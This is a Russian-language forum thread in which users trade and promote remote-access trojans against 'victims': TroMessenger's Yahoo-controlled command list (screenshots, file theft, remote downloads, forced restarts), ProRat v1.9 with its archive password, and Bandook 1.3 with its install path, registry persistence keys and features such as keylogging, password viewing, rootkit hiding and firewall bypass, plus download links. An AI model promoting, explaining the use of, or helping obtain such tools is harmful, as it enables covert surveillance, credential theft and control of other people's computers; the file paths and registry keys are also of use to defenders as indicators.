Трояны

[zoommm]

но что-то в нём не то ........

да да согласен !!половину не отображается (((ну не хватает размкра окошка в котором настраивают)

 

[blood]

может я чтото упустил но (клиент соеденяется с сервером но никаких действий с жертвой сделать нельзя просто ничего не происходит ошибок нет ) что ето такое оболочка с кнопочками

 

[Ŧ1LAN]

Всё конечно хочется списать на бета версию, но я щас сам кое что проверю...

 

[Ar3s]

Ну как? Проверил?

 

[AHTOLLlKA]

гЫЫ
мудно )))

 

[blood]

ну ктото уже проверил может+ вы хоть скажите у вас тоже как у меня (может у кого виртуальная машина установлена протестите плиз)

 

[Winux]

TroMessenger 1.1
Скриншот|Screenshot

Неплохой трой, работающий на Yhoo протоколе, тоесть все управление осуществляется через yahoo.
От Вас потребуется вбить акк на Yahoo для бота и акк админа, с которого будет осуществляться управление.
Можно поставить пасс, чтобы иметь жертву с другого ID.[New$paN]
Основные функции, думаю переводить не стоит:

/Help - Displays the list of available commands in this version of TroMessenger. maybe news commands be added in next versions. so you will know them by using this command.

/screenshot - Shows you a screenshot from the Remote PC.
Question - Yahoo! Messenger is a Text-Based program, but how TroMessenger can show me a picture ?
Answer - TroMessenger shows you the picture indirectly. that means: it takes the screenshot, and uploads it to the host, and gives you the link to the taken picture.

/download - Downloads a file from web and saves it in the specified location at the Remote PC. You will be notified by finishing the download.
Syntax: /download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"
Note: You must use Quote Marks ("). If you forgot to put quotes, download will not work.

/restart - Restarts the Windows in the Remote PC.
Warning: If you test it on your PC, you will be restarted without any question or confirmation. and any changes in your programs will be lost. so care about using this command. also Shutdown command.

/shutdown - Turns Off the Remote PC. (The warning repeated)

/time , /date - Shows the DateTime.

/ejectcd - Ejects the CD-ROM Drive.

/closecd - Closes the door of CD-ROM Drive after ejection.

/view - For showing content of Text Files. Note: if the text is longer than ... bytes, it will be divided to several pieces and they will be sent one after one.

/getfile - uploads a specified file to host and gives you the link. This is used for downloading binary (non-text) files from remote pc.

/status , /idle , /busy - Sets the Status Message of the Robot to what you want. Plus using Busy and Idle Icons beside ID.
Example Syntaxes:
/status Now I'm ready.
/idle I'm away from PC.
/busy Currently Busy.

/cancel - Cancels the current executing job. For example you decided to view a 1MB text file. and the text is being sent to you piece by piece, but you suddenly decide to cancel the operation and not to send the remaining pieces of text. Just use a /cancel command.

/login - For logging in of non-admin users. Everytime TroMessenger starts, if you are not the predefined Admin of Robot, but you know the password, you should use /login your password to begin using program. Don't use quote marks for your password.

Скачать|Download

 

[Mikhalych]

http://www.desihackers.web1000.com/Trojans.htm - тут есть ......

мм просит пароль. Выложи на форум плиз.

 

[Winux]

ProRat v1.9 Fix2 public
Вышел паблик-релиз ProRat v1.9. Это весьма неплохой трой - бэкдор с кучей функций. Комменты излишни.[New$paN]
Скачать с оффсайта:
Скачать|Download

Скоро может залью на наш ФТП для надежности.

 

[Mikhalych]

А пароль какой?

 

[san4ez]

pro

 

[Ŧ1LAN]

Bandook 1.3 by Princeali

написан на С++
впервые увидел свет в 09/17/2005
размер сервера ~18kb

c:\WINDOWS\system32\ali.exe

[New$paN]
ключики:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Bandook"
data: C:\WINDOWS\System32\ali.exe 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{B6A807N6-42DF-4W02-93E5-B156B3FA8AL1} "StubPath"
data: C:\WINDOWS\System32\ali.exe

Tech :
-------
*Firewall By Pass Plus Plus (++) , User level APIs Unhook / SDT Restore POC Method
*Persistance Option (File / Startup keys Rewritten on Deletion,Restarted on Process Termination ,Safe Mode Boot)
*Rootkit Option : Hide Process/Startup keys/and File / connection

Curent Features :
-------------------
*File Manager
*Registry Manager
*Folder Mirroring
*Screen Capture (JPEG / PNG)
*Cam Capture (JPEG / PNG)
*Mic Capture
*Windows Manager
*Ims Spy (MSN/YAHOO/AIM)
*Process Manager
*Protected Password Storage Viewer
*Instant Messenger Passwords Viewer
*Remote Shell
*Online/Offline keylogger
*HTTP Webserver
*Socks 4
*HTTP Proxy
*Port Redirection
*Download File from url
*Mass Download

тестировалось на Windows XP

Скачать|Download 1.75MB

 

[hertz]

:swoon2:
Добавлено в [time]1144570728[/time]
:punk: Э-э дествительно, парольчик б не мешало к архиву выложить...

 

[Ŧ1LAN]

Э-э дествительно, парольчик б не мешало к архиву выложить...

Какому архиву? ко всем архивам есть пароли(если их ставили).

 

[Mikhalych]

hertz
Если ты про ProRat
то пароль pro

 

[Spawn™]

можете разъяснить что эта Bandook 1.3 by Princeali прога делает ?

 

[MTL]

Тип адреса неизвестен или не поддерживается.

c:/www/prorat.net/error/internal_server_error.php

Я чего-то не могу скачать прорет, когда нажимаю на ссылку, появляется вот эта фигня. :blink:

 

[Ŧ1LAN]

Spawn™

можете разъяснить что эта Bandook 1.3 by Princeali прога делает ?

Простой бэкдор, описание я впринципе дал, или может быть тебе ещё и на русский перевести всё? там кста в архиве ещё и мануальчик к нему небольшой есть.

 

[zoommm]

Bandook 1.3

тестировалось на Windows XP

могу предположимть что под sp2 не работает !!!!111или это не так развейте мои сомнения !

 

[blood]

большая колекция троянов
на сайте также много других полезних вещей